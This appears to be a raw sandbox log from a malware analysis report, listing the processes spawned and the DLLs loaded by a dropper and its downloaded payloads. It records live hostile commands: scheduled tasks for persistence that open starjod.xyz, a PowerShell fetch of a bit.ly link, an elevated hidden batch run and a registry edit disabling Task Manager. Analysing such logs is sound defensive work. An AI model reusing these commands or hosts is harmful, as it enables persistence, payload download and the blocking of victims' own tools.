Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe "C:\Users\user~1\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe"
Source: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1lLub	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process created: C:\Users\user\AppData\Local\Temp\6.exe "C:\Users\user~1\AppData\Local\Temp\6.exe"	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process created: C:\Users\user\AppData\Local\Temp\7.exe "C:\Users\user~1\AppData\Local\Temp\7.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1880,i,1559005208409857201,3821663929955985099,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://starjod.xyz/Website.php	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Process created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe "C:\Users\user~1\AppData\Local\Temp\8254624243\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe "C:\Users\user~1\AppData\Local\Temp\1000035001\gold.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe "C:\Users\user~1\AppData\Local\Temp\1000064001\NewLatest.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe "C:\Users\user~1\AppData\Local\Temp\1000091001\Installer.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe "C:\Users\user~1\AppData\Local\Temp\1000108001\ldr.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe "C:\Users\user~1\AppData\Local\Temp\1000109001\alex5555555.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000110001\123.exe "C:\Users\user~1\AppData\Local\Temp\1000110001\123.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe "C:\Users\user~1\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe "C:\Users\user~1\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7752 -ip 7752
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7752 -s 320
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 212 -p 8560 -ip 8560
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8560 -s 284
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Process created: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe "C:\Users\user~1\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Process created: C:\Users\user\AppData\Local\Temp\1000020001\1.exe "C:\Users\user~1\AppData\Local\Temp\1000020001\1.exe"
Source: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ins.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-Process 'C:\Users\user~1\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1992,i,12647430490960773708,190328804482566679,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=1844,i,568275399353426171,11183762438970494550,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe	Process created: C:\Users\user\AppData\Local\Temp\28feeece5c\Hkbsse.exe "C:\Users\user~1\AppData\Local\Temp\28feeece5c\Hkbsse.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user~1\AppData\Local\Temp\install.bat"
Source: C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe "C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe "C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe"
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "Cleaner" /tr "C:\Users\user\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: w32time.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vmictimeprovider.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
